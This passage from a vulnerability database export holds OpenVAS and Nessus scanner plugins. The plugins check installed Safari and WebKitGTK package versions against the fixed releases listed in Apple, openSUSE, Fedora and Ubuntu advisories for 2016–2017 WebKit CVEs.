script_oid(\"1.3.6.1.4.1.25623.1.0.811251\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7060\", \"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7018\",\n \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\",\n \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7038\",\n \"CVE-2017-7059\", \"CVE-2017-7049\", \"CVE-2017-7064\", \"CVE-2017-7019\",\n \"CVE-2017-7012\");\n script_bugtraq_id(99887, 99886, 99885, 99888, 99890);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 11:35:58 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207921\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the processing of print dialogs in Printing module.\n\n - An error in painting the cross-origin buffer into the frame in Webkit module.\n\n - A state management issue due to error in frame handling.\n\n - Multiple memory corruption issues in WebKit module.\n\n - A logic issue existed in the handling of DOMParser in WebKit module.\n\n - A memory initialization issue in WebKit module.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct cross site scripting and address bar spoofing attacks,\n allow cross-origin data to be exfiltrated by using SVG filters to conduct a\n timing side-channel attack, arbitrary code execution, read restricted memory\n and put browser into an infinite number of print dialogs making users believe\n their browser was locked.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207921\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!safVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"10.1.2\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1.2\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:27:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-11-11T00:00:00", "id": "OPENVAS:1361412562310851645", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851645", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2017:2991-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851645\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-11 07:31:25 +0100 (Sat, 11 Nov 2017)\");\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\",\n \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\",\n \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\",\n \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\",\n \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\",\n \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\",\n \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\",\n \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2017:2991-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.18.0 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2991-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2538"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-26T00:00:00", "id": "OPENVAS:1361412562310872922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872922", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_37f68e3534_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872922\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-26 07:34:03 +0200 (Wed, 26 Jul 2017)\");\n script_cve_id(\"CVE-2017-2538\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-37f68e3534\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P5AUAAZXVI23QXJJOKWGDJE4V37RRORR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.5~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2538"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-14T00:00:00", "id": "OPENVAS:1361412562310872844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872844", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872844\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-14 15:54:58 +0530 (Fri, 14 Jul 2017)\");\n script_cve_id(\"CVE-2017-2538\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-bff1b87765\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2BF3P4WVYUK7QE6ISXAIFFINGK7JFSPV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.5~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-02-01T07:23:20", "description": "A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-03T00:00:00", "title": "Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "cpe:/o:canonical:ubuntu_linux:17.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3376-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3376-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102161);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"USN\", value:\"3376-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3376-1/\"\n );\n script_set_attribute(\n 